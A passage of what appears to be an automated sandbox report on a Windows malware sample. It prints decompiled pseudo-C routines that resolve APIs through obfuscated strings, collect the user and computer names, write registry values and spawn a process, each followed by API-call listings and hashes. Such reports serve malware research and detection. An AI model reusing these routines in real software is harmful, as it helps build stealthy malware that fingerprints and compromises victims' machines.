                						_t60 =  *_t80(_a4);
                						_t91 = E001D7E20(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                						if(_t91 == 0) {
                							E001DA5FA(_v20);
                						} else {
                							_t66 =  *0x1dd2a4; // 0x2dca5a8
                							_t31 = _t66 + 0x1dec48; // 0x73006d
                							 *0x1dd11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                							 *_a16 = _v20;
                							_v24 = _v24 & 0x00000000;
                							 *_a20 = _t91;
                						}
                					}
                					E001DA5FA(_v12);
                				}
                				return _v24;
                			}





























                APIs
                • GetTickCount.KERNEL32 ref: 001D4759
                • lstrlen.KERNEL32(?,80000002,00000005), ref: 001D4799
                • lstrlen.KERNEL32(00000000), ref: 001D47A2
                • lstrlen.KERNEL32(00000000), ref: 001D47A9
                • lstrlenW.KERNEL32(80000002), ref: 001D47B6
                • lstrlen.KERNEL32(?,00000004), ref: 001D4816
                • lstrlen.KERNEL32(?), ref: 001D481F
                • lstrlen.KERNEL32(?), ref: 001D4826
                • lstrlenW.KERNEL32(?), ref: 001D482D
                  • Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: lstrlen$CountFreeHeapTick
                • String ID:
                • API String ID: 2535036572-0
                • Opcode ID: 4c7cea8f7c3f07c5e1f370ff0a55056344185bb3cd42dfc201d9e9635b7b4543
                • Instruction ID: cfb44c02719773c3ddca520f3d03887870d65be50b14e92250d021f8e27be06b
                • Opcode Fuzzy Hash: 4c7cea8f7c3f07c5e1f370ff0a55056344185bb3cd42dfc201d9e9635b7b4543
                • Instruction Fuzzy Hash: 0C416A7280121AFBCF11AFA4DC0599EBBB9EF44344F014062F904A7361DB36DA51EB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E001D4EEC(void* __eax, void* __ecx) {
                				long _v8;
                				char _v12;
                				void* _v16;
                				void* _v28;
                				long _v32;
                				void _v104;
                				char _v108;
                				long _t36;
                				intOrPtr _t40;
                				intOrPtr _t47;
                				intOrPtr _t50;
                				void* _t58;
                				void* _t68;
                				intOrPtr* _t70;
                				intOrPtr* _t71;
                
                				_t1 = __eax + 0x14; // 0x74183966
                				_t69 =  *_t1;
                				_t36 = E001D4896(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                				_v8 = _t36;
                				if(_t36 != 0) {
                					L12:
                					return _v8;
                				}
                				E001DA88E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                				_t40 = _v12(_v12);
                				_v8 = _t40;
                				if(_t40 == 0 && ( *0x1dd260 & 0x00000001) != 0) {
                					_v32 = 0;
                					asm("stosd");
                					asm("stosd");
                					asm("stosd");
                					_v108 = 0;
                					memset( &_v104, 0, 0x40);
                					_t47 =  *0x1dd2a4; // 0x2dca5a8
                					_t18 = _t47 + 0x1de3e6; // 0x73797325
                					_t68 = E001D903C(_t18);
                					if(_t68 == 0) {
                						_v8 = 8;
                					} else {
                						_t50 =  *0x1dd2a4; // 0x2dca5a8
                						_t19 = _t50 + 0x1de747; // 0x2fa8cef
                						_t20 = _t50 + 0x1de0af; // 0x4e52454b
                						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                						if(_t71 == 0) {
                							_v8 = 0x7f;
                						} else {
                							_v108 = 0x44;
                							E001D9186();
                							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                							_push(1);
                							E001D9186();
                							if(_t58 == 0) {
                								_v8 = GetLastError();
                							} else {
                								CloseHandle(_v28);
                								CloseHandle(_v32);
                							}
                						}
                						HeapFree( *0x1dd238, 0, _t68);
                					}
                				}
                				_t70 = _v16;
                				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                				E001DA5FA(_t70);
                				goto L12;
                			}



















                APIs
                  • Part of subcall function 001D4896: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,001D4F08,?,00000001,?,?,00000000,00000000), ref: 001D48BB
                  • Part of subcall function 001D4896: GetProcAddress.KERNEL32(00000000,7243775A), ref: 001D48DD
                  • Part of subcall function 001D4896: GetProcAddress.KERNEL32(00000000,614D775A), ref: 001D48F3
                  • Part of subcall function 001D4896: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 001D4909
                  • Part of subcall function 001D4896: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 001D491F
                  • Part of subcall function 001D4896: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 001D4935
                • memset.NTDLL ref: 001D4F56
                  • Part of subcall function 001D903C: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,001D5D90,63699BCE,001D4CBB,73797325), ref: 001D904D
                  • Part of subcall function 001D903C: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 001D9067
                • GetModuleHandleA.KERNEL32(4E52454B,02FA8CEF,73797325), ref: 001D4F8C
                • GetProcAddress.KERNEL32(00000000), ref: 001D4F93
                • HeapFree.KERNEL32(00000000,00000000), ref: 001D4FFB
                  • Part of subcall function 001D9186: GetProcAddress.KERNEL32(36776F57,001D67DC), ref: 001D91A1
                • CloseHandle.KERNEL32(00000000,00000001), ref: 001D4FD8
                • CloseHandle.KERNEL32(?), ref: 001D4FDD
                • GetLastError.KERNEL32(00000001), ref: 001D4FE1
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                • String ID:
                • API String ID: 3075724336-0
                • Opcode ID: 7e49fc6ee228094c1b880fc9d8b271488e699f2fc47bc48ba919a5e3c97d8b52
                • Instruction ID: 652c85721afce153c3c20b483f314c8634b6897d835941b24f78504275056467
                • Opcode Fuzzy Hash: 7e49fc6ee228094c1b880fc9d8b271488e699f2fc47bc48ba919a5e3c97d8b52
                • Instruction Fuzzy Hash: 86315AB6801209BFDB10AFA8DC88D9EBBBCEF08344F104566F605A7221C730AD45DB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 63%
                			E001D8840(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                				intOrPtr _v8;
                				intOrPtr _t9;
                				intOrPtr _t13;
                				char* _t28;
                				void* _t33;
                				void* _t34;
                				char* _t36;
                				intOrPtr* _t40;
                				char* _t41;
                				char* _t42;
                				char* _t43;
                
                				_t34 = __edx;
                				_push(__ecx);
                				_t9 =  *0x1dd2a4; // 0x2dca5a8
                				_t1 = _t9 + 0x1de62c; // 0x253d7325
                				_t36 = 0;
                				_t28 = E001D2BC9(__ecx, _t1);
                				if(_t28 != 0) {
                					_t40 = __imp__;
                					_t13 =  *_t40(_t28);
                					_v8 = _t13;
                					_t41 = E001D7E20(_v8 +  *_t40(_a4) + 1);
                					if(_t41 != 0) {
                						strcpy(_t41, _t28);
                						_pop(_t33);
                						__imp__(_t41, _a4);
                						_t36 = E001D5FCE(_t34, _t41, _a8);
                						E001DA5FA(_t41);
                						_t42 = E001D7D98(StrTrimA(_t36, "="), _t36);
                						if(_t42 != 0) {
                							E001DA5FA(_t36);
                							_t36 = _t42;
                						}
                						_t43 = E001D7EBE(_t36, _t33);
                						if(_t43 != 0) {
                							E001DA5FA(_t36);
                							_t36 = _t43;
                						}
                					}
                					E001DA5FA(_t28);
                				}
                				return _t36;
                			}















                APIs
                  • Part of subcall function 001D2BC9: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,001D885A,253D7325,00000000,00000000,7742C740,?,?,001D2AF0,?), ref: 001D2C30
                  • Part of subcall function 001D2BC9: sprintf.NTDLL ref: 001D2C51
                • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,001D2AF0,?,02FA95B0), ref: 001D886B
                • lstrlen.KERNEL32(?,?,?,001D2AF0,?,02FA95B0), ref: 001D8873
                  • Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C
                • strcpy.NTDLL ref: 001D888A
                • lstrcat.KERNEL32(00000000,?), ref: 001D8895
                  • Part of subcall function 001D5FCE: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,001D88A4,00000000,?,?,?,001D2AF0,?,02FA95B0), ref: 001D5FE5
                  • Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606
                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,001D2AF0,?,02FA95B0), ref: 001D88B2
                  • Part of subcall function 001D7D98: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,001D88BE,00000000,?,?,001D2AF0,?,02FA95B0), ref: 001D7DA2
                  • Part of subcall function 001D7D98: _snprintf.NTDLL ref: 001D7E00
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                • String ID: =
                • API String ID: 2864389247-1428090586
                • Opcode ID: 83769cba7a5f1cdfdc05364cf5988c44526da56ce5f6c51d8c5742cb613f0052
                • Instruction ID: b479f13058643177f91b3dbf0b290b47c8c9155efc0be343d39f9eb06f6b7d03
                • Opcode Fuzzy Hash: 83769cba7a5f1cdfdc05364cf5988c44526da56ce5f6c51d8c5742cb613f0052
                • Instruction Fuzzy Hash: 6A11C2379026257B8612BBB8AC85C7F3BAE9F957613050427F6019B341DF35CD02A7E2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(00000000), ref: 001D15F2
                • SysAllocString.OLEAUT32(0070006F), ref: 001D1606
                • SysAllocString.OLEAUT32(00000000), ref: 001D1618
                • SysFreeString.OLEAUT32(00000000), ref: 001D1680
                • SysFreeString.OLEAUT32(00000000), ref: 001D168F
                • SysFreeString.OLEAUT32(00000000), ref: 001D169A
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: f13ae21b013a381290a2a1d75c7f03462c65b5520ca1a10422671f11e01aec35
                • Instruction ID: eafdcb8621c12669d28606b428cbee392fbcce46ff20bc252ded434e08b00682
                • Opcode Fuzzy Hash: f13ae21b013a381290a2a1d75c7f03462c65b5520ca1a10422671f11e01aec35
                • Instruction Fuzzy Hash: 1D413C36D0060ABBDB01DFF8D844AAEB7BAAF49301F144466E914EB260DBB1DD45CB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E001D4896(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                				intOrPtr _v8;
                				intOrPtr _t23;
                				intOrPtr _t26;
                				_Unknown_base(*)()* _t28;
                				intOrPtr _t30;
                				_Unknown_base(*)()* _t32;
                				intOrPtr _t33;
                				_Unknown_base(*)()* _t35;
                				intOrPtr _t36;
                				_Unknown_base(*)()* _t38;
                				intOrPtr _t39;
                				_Unknown_base(*)()* _t41;
                				intOrPtr _t44;
                				struct HINSTANCE__* _t48;
                				intOrPtr _t54;
                
                				_t54 = E001D7E20(0x20);
                				if(_t54 == 0) {
                					_v8 = 8;
                				} else {
                					_t23 =  *0x1dd2a4; // 0x2dca5a8
                					_t1 = _t23 + 0x1de11a; // 0x4c44544e
                					_t48 = GetModuleHandleA(_t1);
                					_t26 =  *0x1dd2a4; // 0x2dca5a8
                					_t2 = _t26 + 0x1de769; // 0x7243775a
                					_v8 = 0x7f;
                					_t28 = GetProcAddress(_t48, _t2);
                					 *(_t54 + 0xc) = _t28;
                					if(_t28 == 0) {
                						L8:
                						E001DA5FA(_t54);
                					} else {
                						_t30 =  *0x1dd2a4; // 0x2dca5a8
                						_t5 = _t30 + 0x1de756; // 0x614d775a
                						_t32 = GetProcAddress(_t48, _t5);
                						 *(_t54 + 0x10) = _t32;
                						if(_t32 == 0) {
                							goto L8;
                						} else {
                							_t33 =  *0x1dd2a4; // 0x2dca5a8
                							_t7 = _t33 + 0x1de40b; // 0x6e55775a
                							_t35 = GetProcAddress(_t48, _t7);
                							 *(_t54 + 0x14) = _t35;
                							if(_t35 == 0) {
                								goto L8;
                							} else {
                								_t36 =  *0x1dd2a4; // 0x2dca5a8
                								_t9 = _t36 + 0x1de4d2; // 0x4e6c7452
                								_t38 = GetProcAddress(_t48, _t9);
                								 *(_t54 + 0x18) = _t38;
                								if(_t38 == 0) {
                									goto L8;
                								} else {
                									_t39 =  *0x1dd2a4; // 0x2dca5a8
                									_t11 = _t39 + 0x1de779; // 0x6c43775a
                									_t41 = GetProcAddress(_t48, _t11);
                									 *(_t54 + 0x1c) = _t41;
                									if(_t41 == 0) {
                										goto L8;
                									} else {
                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                										_t44 = E001D6582(_t54, _a8);
                										_v8 = _t44;
                										if(_t44 != 0) {
                											goto L8;
                										} else {
                											 *_a12 = _t54;
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v8;
                			}



















                APIs
                  • Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C
                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,001D4F08,?,00000001,?,?,00000000,00000000), ref: 001D48BB
                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 001D48DD
                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 001D48F3
                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 001D4909
                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 001D491F
                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 001D4935
                  • Part of subcall function 001D6582: memset.NTDLL ref: 001D6601
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: AddressProc$AllocateHandleHeapModulememset
                • String ID:
                • API String ID: 1886625739-0
                • Opcode ID: 3dd6389c6cc43900902a424be59df8675151c9cd7c8be4125b7ce50b321ddd41
                • Instruction ID: 5b86bc9f3f8b3b76f868632c577c74ce5f1f4527ee0cd7dff895b830012868e8
                • Opcode Fuzzy Hash: 3dd6389c6cc43900902a424be59df8675151c9cd7c8be4125b7ce50b321ddd41
                • Instruction Fuzzy Hash: F6215CB160260AAFD720EF6ADC84E6BB7ECEF48704B114467E549DB351E770E905CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __CreateFrameInfo.LIBCMT ref: 6E284BF3
                  • Part of subcall function 6E281407: __getptd.LIBCMT ref: 6E281415
                  • Part of subcall function 6E281407: __getptd.LIBCMT ref: 6E281423
                • __getptd.LIBCMT ref: 6E284BFD
                  • Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
                  • Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317
                • __getptd.LIBCMT ref: 6E284C0B
                • __getptd.LIBCMT ref: 6E284C19
                • __getptd.LIBCMT ref: 6E284C24
                • _CallCatchBlock2.LIBCMT ref: 6E284C4A
                  • Part of subcall function 6E2814AC: __CallSettingFrame@12.LIBCMT ref: 6E2814F8
                  • Part of subcall function 6E284CF1: __getptd.LIBCMT ref: 6E284D00
                  • Part of subcall function 6E284CF1: __getptd.LIBCMT ref: 6E284D0E
                Memory Dump Source
                • Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                • String ID:
                • API String ID: 1602911419-0
                • Opcode ID: 2b5c4b26aa238ef2731b7681a9c10d53cc21645a98bdbbf697043bcf6117ff31
                • Instruction ID: 0eeec9ef972102bf9326ffb8020914b492c23d94844a8e1d1290eaa553f34b8c
                • Opcode Fuzzy Hash: 2b5c4b26aa238ef2731b7681a9c10d53cc21645a98bdbbf697043bcf6117ff31
                • Instruction Fuzzy Hash: 6E11D7B5C0024DDFDB00DFE4C448AEEBBBAFF14318F108969E854A7290DB389A599F54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E001D3F60(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                				signed int _v8;
                				char _v12;
                				signed int* _v16;
                				char _v284;
                				void* __esi;
                				char* _t60;
                				intOrPtr* _t61;
                				intOrPtr _t65;
                				char _t68;
                				intOrPtr _t71;
                				intOrPtr _t72;
                				intOrPtr _t74;
                				signed int _t85;
                				void* _t95;
                				void* _t96;
                				char _t102;
                				signed int* _t104;
                				intOrPtr* _t105;
                				void* _t106;
                
                				_t96 = __ecx;
                				_v8 = _v8 & 0x00000000;
                				_t102 = _a16;
                				if(_t102 == 0) {
                					__imp__( &_v284,  *0x1dd33c);
                					_t95 = 0x80000002;
                					L6:
                					_t60 = E001D1546(0,  &_v284);
                					_a8 = _t60;
                					if(_t60 == 0) {
                						_v8 = 8;
                						L29:
                						_t61 = _a20;
                						if(_t61 != 0) {
                							 *_t61 =  *_t61 + 1;
                						}
                						return _v8;
                					}
                					_t105 = _a24;
                					if(E001D922B(_t96, _t101, _t105, _t95, _t60) != 0) {
                						L27:
                						E001DA5FA(_a8);
                						goto L29;
                					}
                					_t65 =  *0x1dd2a4; // 0x2dca5a8
                					_t16 = _t65 + 0x1de8fe; // 0x65696c43
                					_t68 = E001D1546(0, _t16);
                					_a24 = _t68;
                					if(_t68 == 0) {
                						L14:
                						_t29 = _t105 + 0x14; // 0x102
                						_t69 =  *_t29;
                						_t33 = _t105 + 0x10; // 0x3d001dc0
                						if(E001D4413(_t101,  *_t33, _t95, _a8,  *0x1dd334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)(_t69 + 0x2c))) == 0) {
                							_t71 =  *0x1dd2a4; // 0x2dca5a8
                							if(_t102 == 0) {
                								_t35 = _t71 + 0x1dea5f; // 0x4d4c4b48
                								_t72 = _t35;
                							} else {
                								_t34 = _t71 + 0x1de89f; // 0x55434b48
                								_t72 = _t34;
                							}
                							if(E001D4744(_t72,  *0x1dd334,  *0x1dd338,  &_a24,  &_a16) == 0) {
                								if(_t102 == 0) {
                									_t74 =  *0x1dd2a4; // 0x2dca5a8
                									_t44 = _t74 + 0x1de871; // 0x74666f53
                									_t103 = E001D1546(0, _t44);
                									if(_t77 == 0) {
                										_v8 = 8;
                									} else {
                										_t47 = _t105 + 0x10; // 0x3d001dc0
                										E001D27A2( *_t47, _t95, _a8,  *0x1dd338, _a24);
                										_t49 = _t105 + 0x10; // 0x3d001dc0
                										E001D27A2( *_t49, _t95, _t103,  *0x1dd330, _a16);
                										E001DA5FA(_t103);
                									}
                								} else {
                									_t40 = _t105 + 0x10; // 0x3d001dc0
                									E001D27A2( *_t40, _t95, _a8,  *0x1dd338, _a24);
                									_t43 = _t105 + 0x10; // 0x3d001dc0
                									E001D27A2( *_t43, _t95, _a8,  *0x1dd330, _a16);
                								}
                								if( *_t105 != 0) {
                									E001DA5FA(_a24);
                								} else {
                									 *_t105 = _a16;
                								}
                							}
                						}
                						goto L27;
                					}
                					_t21 = _t105 + 0x10; // 0x3d001dc0
                					_t85 = E001D5AF6( *_t21, _t95, _a8, _t68,  &_v16,  &_v12);
                					if(_t85 == 0) {
                						_t104 = _v16;
                						if(_v12 == 0x28) {
                							 *_t104 =  *_t104 & _t85;
                							_t26 = _t105 + 0x10; // 0x3d001dc0
                							E001D4413(_t101,  *_t26, _t95, _a8, _a24, _t104, 0x28);
                						}
                						E001DA5FA(_t104);
                						_t102 = _a16;
                					}
                					E001DA5FA(_a24);
                					goto L14;
                				}
                				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                					goto L29;
                				} else {
                					_t101 = _a8;
                					E001DA88E(_t102, _a8,  &_v284);
                					__imp__(_t106 + _t102 - 0x117,  *0x1dd33c);
                					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                					_t95 = 0x80000003;
                					goto L6;
                				}
                			}























                APIs
                • StrChrA.SHLWAPI(001D86C4,0000005F,00000000,00000000,00000104), ref: 001D3F93
                • lstrcpy.KERNEL32(?,?), ref: 001D3FC0
                  • Part of subcall function 001D1546: lstrlen.KERNEL32(?,00000000,001DD330,00000001,001D67F7,001DD00C,001DD00C,00000000,00000005,00000000,00000000,?,?,?,001D41AA,001D5D90), ref: 001D154F
                  • Part of subcall function 001D1546: mbstowcs.NTDLL ref: 001D1576
                  • Part of subcall function 001D1546: memset.NTDLL ref: 001D1588
                  • Part of subcall function 001D27A2: lstrlenW.KERNEL32(?,?,?,001D4133,3D001DC0,80000002,001D86C4,001D2F48,74666F53,4D4C4B48,001D2F48,?,3D001DC0,80000002,001D86C4,?), ref: 001D27C7
                  • Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606
                • lstrcpy.KERNEL32(?,00000000), ref: 001D3FE2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                • String ID: ($\
                • API String ID: 3924217599-1512714803
                • Opcode ID: 2952964e4cc602648ce40cc4ebfec983e2dc5affae20eedbfbc705a6a983c357
                • Instruction ID: d407fdc591c45f26b7985c389b30cc94f8f4a38c7a6533de38af5188d4ace7e9
                • Opcode Fuzzy Hash: 2952964e4cc602648ce40cc4ebfec983e2dc5affae20eedbfbc705a6a983c357
                • Instruction Fuzzy Hash: DC515C7210120AFFDF21EFA0ED40EAA37B9FF64300F108516FA1596261DB35E995EB12
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E001D1363() {
                				long _v8;
                				long _v12;
                				int _v16;
                				long _t39;
                				long _t43;
                				signed int _t47;
                				short _t51;
                				signed int _t52;
                				int _t56;
                				int _t57;
                				char* _t64;
                				short* _t67;
                
                				_v16 = 0;
                				_v8 = 0;
                				GetUserNameW(0,  &_v8);
                				_t39 = _v8;
                				if(_t39 != 0) {
                					_v12 = _t39;
                					_v8 = 0;
                					GetComputerNameW(0,  &_v8);
                					_t43 = _v8;
                					if(_t43 != 0) {
                						_v12 = _v12 + _t43 + 2;
                						_t64 = E001D7E20(_v12 + _t43 + 2 << 2);
                						if(_t64 != 0) {
                							_t47 = _v12;
                							_t67 = _t64 + _t47 * 2;
                							_v8 = _t47;
                							if(GetUserNameW(_t67,  &_v8) == 0) {
                								L7:
                								E001DA5FA(_t64);
                							} else {
                								_t51 = 0x40;
                								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                								_t52 = _v8;
                								_v12 = _v12 - _t52;
                								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                									goto L7;
                								} else {
                									_t56 = _v12 + _v8;
                									_t31 = _t56 + 2; // 0x1d2a02
                									_v12 = _t56;
                									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                									_v8 = _t57;
                									if(_t57 == 0) {
                										goto L7;
                									} else {
                										_t64[_t57] = 0;
                										_v16 = _t64;
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v16;
                			}
















                APIs
                • GetUserNameW.ADVAPI32(00000000,001D2A00), ref: 001D1377
                • GetComputerNameW.KERNEL32(00000000,001D2A00), ref: 001D1393
                  • Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C
                • GetUserNameW.ADVAPI32(00000000,001D2A00), ref: 001D13CD
                • GetComputerNameW.KERNEL32(001D2A00,?), ref: 001D13F0
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,001D2A00,00000000,001D2A02,00000000,00000000,?,?,001D2A00), ref: 001D1413
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                • String ID:
                • API String ID: 3850880919-0
                • Opcode ID: a1f3dc1b52f5ae0ca26362936cd91fef5cbeecd77363b5198219cf62b0c84854
                • Instruction ID: bfdaa1f9e274164a8a0a6da712baa5ab3617310c108c9f8de2a99faba1c3047c
                • Opcode Fuzzy Hash: a1f3dc1b52f5ae0ca26362936cd91fef5cbeecd77363b5198219cf62b0c84854
                • Instruction Fuzzy Hash: 8821D776A01209FFCB11DFE8D9859EEBBBDEF44304B5044AAE501E7240D7309B45DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __getptd.LIBCMT ref: 6E28388C
                  • Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
                  • Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317
                • __amsg_exit.LIBCMT ref: 6E2838AC
                • __lock.LIBCMT ref: 6E2838BC
                • InterlockedDecrement.KERNEL32(?), ref: 6E2838D9
                • InterlockedIncrement.KERNEL32(6E2B3DA8), ref: 6E283904
                Memory Dump Source
                • Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                • String ID:
                • API String ID: 4271482742-0
                • Opcode ID: 7233a2e988d8b053c84c03886333f9d2590991cbf694fddaebd58eccf5d2205b
                • Instruction ID: c099af2b697f64037b011b46a701f204f3e646c18dcbfd5dc47e02c4ec9f2e00
                • Opcode Fuzzy Hash: 7233a2e988d8b053c84c03886333f9d2590991cbf694fddaebd58eccf5d2205b
                • Instruction Fuzzy Hash: 82018435A01A2FABDB519BE5840DB8F7767BF01729F104405D824A76C0CB74698DCBE1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E001D5722(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                				void* __esi;
                				long _t10;
                				void* _t18;
                				void* _t22;
                
                				_t9 = __eax;
                				_t22 = __eax;
                				if(_a4 != 0 && E001D8389(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                					L9:
                					return GetLastError();
                				}
                				_t10 = E001DA961(_t9, _t18, _t22, _a8);
                				if(_t10 == 0) {
                					ResetEvent( *(_t22 + 0x1c));
                					ResetEvent( *(_t22 + 0x20));
                					_push(0);
                					_push(0);
                					_push(0xffffffff);
                					_push(0);
                					_push( *((intOrPtr*)(_t22 + 0x18)));
                					if( *0x1dd12c() != 0) {
                						SetEvent( *(_t22 + 0x1c));
                						goto L7;
                					} else {
                						_t10 = GetLastError();
                						if(_t10 == 0x3e5) {
                							L7:
                							_t10 = 0;
                						}
                					}
                				}
                				if(_t10 == 0xffffffff) {
                					goto L9;
                				}
                				return _t10;
                			}








                APIs
